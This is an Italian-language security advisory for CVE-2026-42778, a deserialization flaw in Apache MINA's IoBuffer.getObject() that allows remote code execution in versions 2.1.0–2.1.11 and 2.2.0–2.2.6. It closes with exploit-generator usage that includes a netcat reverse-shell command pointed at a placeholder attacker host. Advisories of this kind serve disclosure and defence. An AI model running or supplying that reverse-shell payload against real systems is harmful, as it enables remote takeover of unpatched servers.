
CVE-2026-42778 EUVD-2026-26492 Deserializzazione di dati non attendibili (CWE-502)
Fix incompleto nel metodo AbstractIoBuffer.getObject() di Apache MINA. La validazione della allowlist dei nomi delle classi, che limita quali classi possono essere deserializzate, viene applicata troppo tardi, dopo che gli inizializzatori statici nelle classi in lettura potrebbero essere già stati eseguiti. Ciò accade perché il fix originale per CVE-2024-52046 non è stato applicato correttamente ai rami 2.1.X e 2.2.X. Versioni interessate: - Apache MINA 2.1.0 fino a 2.1.11 - Apache MINA 2.2.0 fino a 2.2.6
ID CVE: CVE-2026-42778
Pubblicato: 05/01/2026
Impatto: Critico
Disponibilità dell'exploit: Non pubblico, solo privato.
CVSS: 9.8
Patch disponibile: (Nessuna patch ufficiale ancora)
Un attaccante può creare oggetti serializzati malevoli che, quando elaborati da IoBuffer.getObject(), eseguono codice arbitrario tramite inizializzatori statici prima che avvenga la validazione della allowlist dei nomi delle classi. Poiché si tratta di una vulnerabilità accessibile in rete che non richiede privilegi o interazione con l'utente, è possibile l'esecuzione remota di codice per qualsiasi applicazione che utilizza Apache MINA e che chiama il metodo IoBuffer.getObject(). La vulnerabilità consente il completo compromesso di riservatezza, integrità e disponibilità dei sistemi interessati.
# Compila e genera
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"
# Invia sulla rete al servizio basato su MINA utilizzando ObjectSerializationCodecFactory
# o a qualsiasi endpoint che chiama IoBuffer.getObject()